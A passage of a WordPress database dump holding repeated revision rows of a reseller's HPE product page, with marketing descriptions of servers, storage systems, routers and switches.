DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL385 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL385-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.</p><h4 style=\"text-align: center;\"><strong>HPE Apollo 6000 Chassis</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Apollo-6000-Chassis.png\" alt=\"\" width=\"235\" height=\"160\" /></p><p style=\"text-align: center;\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customerâ€™s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Tower Servers</strong></h2><p style=\"text-align: center;\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML110 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML110-Gen10-Server.png\" alt=\"\" width=\"226\" height=\"169\" /></p><p style=\"text-align: center;\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businessesâ€™ needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML350 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML350-Gen10-Server.png\" alt=\"\" width=\"232\" height=\"185\" /></p><p style=\"text-align: center;\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.Â The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>HPE Synergy</strong></h2><p style=\"text-align: center;\">Composable, software-defined infrastructure that speeds application delivery.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy 12000 Frame</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-12000-Frame.png\" alt=\"\" width=\"226\" height=\"170\" /></p><p style=\"text-align: center;\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy D3940 Storage Module</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-D3940-Storage-Module.png\" alt=\"\" width=\"222\" height=\"166\" /></p><p style=\"text-align: center;\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Data Storage</strong></h2><p style=\"text-align: center;\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.</p><h4 style=\"text-align: center;\"><strong>HPE StoreOnce Systems</strong></h4><hr /><p style=\"text-align: center;\">Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p style=\"text-align: center;\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 8000 Storage</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"232\" height=\"166\" /></p><p style=\"text-align: center;\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 9000 Storage</strong></h4>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"222\" height=\"171\" />\n<p style=\"text-align: center;\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2>NETWORKING</h2><h2 style=\"text-align: center;\"><strong>Router</strong></h2><p style=\"text-align: center;\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.</p><h4 style=\"text-align: center;\"><strong>HPE FLexNetwork MSR95x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FLexNetwork-MSR95x-Router-Series.png\" alt=\"\" width=\"227\" height=\"171\" /></p><p style=\"text-align: center;\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.</p><h4 style=\"text-align: center;\"><strong>Alcatel-Lucent 7750 Service Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Alcatel-Lucent-7750-Service-Router-Series.png\" alt=\"\" width=\"229\" height=\"171\" /></p><p style=\"text-align: center;\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.</p><h4 style=\"text-align: center;\"><strong>HPE FlexNetwork MSR93x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FlexNetwork-MSR93x-Router-Series.png\" alt=\"\" width=\"232\" height=\"188\" /></p><p style=\"text-align: center;\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Switches</strong></h2><h4 style=\"text-align: center;\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\" alt=\"\" width=\"219\" height=\"165\" /></p><p style=\"text-align: center;\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.</p><h4 style=\"text-align: center;\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\" alt=\"\" width=\"244\" height=\"184\" /></p><p style=\"text-align: center;\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100/50/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100/50GbE spine switches. It is optimized for data center hot/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><p style=\"text-align: center;\">To discover more, please click the button below or contact us to discuss your needs.</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','HPE','','inherit','closed','closed','','1529-revision-v1','','','2019-10-01 17:36:05','2019-10-01 09:36:05','',1529,'https://bintara.com.my/blog/2019/10/01/1529-revision-v1/',0,'revision','',0),(3639,1,'2019-10-01 17:37:26','2019-10-01 09:37:26','<h2>SERVER AND SYSTEM</h2><h2 style=\"text-align: center;\"><strong>Rack Servers</strong></h2><p style=\"text-align: center;\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL325 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL325-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Secure and versatile single socket (1P) 1U AMD EPYCâ„¢ based platform offers an exceptional balance of processor, memory and I/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL385 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL385-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.</p><h4 style=\"text-align: center;\"><strong>HPE Apollo 6000 Chassis</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Apollo-6000-Chassis.png\" alt=\"\" width=\"235\" height=\"160\" /></p><p style=\"text-align: center;\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customerâ€™s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Tower Servers</strong></h2><p style=\"text-align: center;\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML110 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML110-Gen10-Server.png\" alt=\"\" width=\"226\" height=\"169\" /></p><p style=\"text-align: center;\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businessesâ€™ needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML350 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML350-Gen10-Server.png\" alt=\"\" width=\"232\" height=\"185\" /></p><p style=\"text-align: center;\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.Â The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>HPE Synergy</strong></h2><p style=\"text-align: center;\">Composable, software-defined infrastructure that speeds application delivery.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy 12000 Frame</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-12000-Frame.png\" alt=\"\" width=\"226\" height=\"170\" /></p><p style=\"text-align: center;\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy D3940 Storage Module</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-D3940-Storage-Module.png\" alt=\"\" width=\"222\" height=\"166\" /></p><p style=\"text-align: center;\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Data Storage</strong></h2><p style=\"text-align: center;\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.</p><h4 style=\"text-align: center;\"><strong>HPE StoreOnce Systems</strong></h4><hr /><p style=\"text-align: center;\">Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p style=\"text-align: center;\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 8000 Storage</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"232\" height=\"166\" /></p><p style=\"text-align: center;\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 9000 Storage</strong></h4>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"222\" height=\"171\" />\n<p style=\"text-align: center;\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2>NETWORKING</h2><h2 style=\"text-align: center;\"><strong>Router</strong></h2><p style=\"text-align: center;\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.</p><h4 style=\"text-align: center;\"><strong>HPE FLexNetwork MSR95x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FLexNetwork-MSR95x-Router-Series.png\" alt=\"\" width=\"227\" height=\"171\" /></p><p style=\"text-align: center;\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.</p><h4 style=\"text-align: center;\"><strong>Alcatel-Lucent 7750 Service Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Alcatel-Lucent-7750-Service-Router-Series.png\" alt=\"\" width=\"229\" height=\"171\" /></p><p style=\"text-align: center;\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.</p><h4 style=\"text-align: center;\"><strong>HPE FlexNetwork MSR93x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FlexNetwork-MSR93x-Router-Series.png\" alt=\"\" width=\"232\" height=\"188\" /></p><p style=\"text-align: center;\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Switches</strong></h2><h4 style=\"text-align: center;\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\" alt=\"\" width=\"219\" height=\"165\" /></p><p style=\"text-align: center;\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.</p><h4 style=\"text-align: center;\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\" alt=\"\" width=\"244\" height=\"184\" /></p><p style=\"text-align: center;\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100/50/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100/50GbE spine switches. It is optimized for data center hot/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><p style=\"text-align: center;\">To discover more, please click the button below or contact us to discuss your needs.</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','HPE','','inherit','closed','closed','','1529-revision-v1','','','2019-10-01 17:37:26','2019-10-01 09:37:26','',1529,'https://bintara.com.my/blog/2019/10/01/1529-revision-v1/',0,'revision','',0),(3640,1,'2019-10-01 17:39:29','2019-10-01 09:39:29','<h2>SERVER AND SYSTEM</h2><h2 style=\"text-align: center;\"><strong>Rack Servers</strong></h2><p style=\"text-align: center;\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL325 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL325-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Secure and versatile single socket (1P) 1U AMD EPYCâ„¢ based platform offers an exceptional balance of processor, memory and I/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL385 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL385-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.</p><h4 style=\"text-align: center;\"><strong>HPE Apollo 6000 Chassis</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Apollo-6000-Chassis.png\" alt=\"\" width=\"235\" height=\"160\" /></p><p style=\"text-align: center;\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customerâ€™s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Tower Servers</strong></h2><p style=\"text-align: center;\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML110 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML110-Gen10-Server.png\" alt=\"\" width=\"226\" height=\"169\" /></p><p style=\"text-align: center;\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businessesâ€™ needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch 